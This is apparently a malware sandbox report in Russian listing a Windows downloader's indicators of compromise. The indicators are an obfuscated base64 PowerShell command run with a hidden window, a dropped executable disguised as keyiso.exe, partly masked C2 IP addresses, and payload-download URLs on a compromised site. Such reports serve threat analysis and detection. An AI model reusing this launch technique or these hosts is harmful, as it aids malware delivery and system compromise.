Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFAHMAbwBsAGcAdwB2AGoAYwA9ACcAQgB1AGgAeABuAHIAZwBjAHIAcAB3AGcAZwAnADsAJABTAHIAYgBoAGEAbQBsAHAAIAA9ACAAJwA2ADgAOAAnADsAJABDAGwAbABsAGYAbwBsAGkAPQAnAFQAbgBpAHQAbwBiAGUAZQBxAHgAdABqACcAOwAkAF...
- %HOMEPATH%\688.exe
- %HOMEPATH%\688.exe в %WINDIR%\syswow64\keyiso\keyiso.exe
- '17#.#21.229.86':80
- '18#.#90.47.173':80
- '91.##6.4.234':443
- http://ch####.lixinyiyuan.com/wp-content/uploads/NpdQNm93/
- http://18#.#90.47.173/2owsBwK/XUGsLjE1xcsUs9V/EmhamPESGDbBEmJz7l/1Ru4bLY3aa1w/
- http://91.###.4.234:443/YRWyAfV3lfRvXAQ7yf/SWmeovLdWqF/IrLClqWNFU5h2LFD/ via 91.##6.4.234
- DNS ASK ch####.lixinyiyuan.com
- '%HOMEPATH%\688.exe'
- '%WINDIR%\syswow64\keyiso\keyiso.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFAHMAbwBsAGcAdwB2AGoAYwA9ACcAQgB1AGgAeABuAHIAZwBjAHIAcAB3AGcAZwAnADsAJABTAHIAYgBoAGEAbQBsAHAAIAA9ACAAJwA2ADgAOAAnADsAJABDAGwAbABsAGYAbwBsAGkAPQAnAFQAbgBpAHQAbwBiAGUAZQBxAHgAdABqACcAOwAkAF...' (со скрытым окном)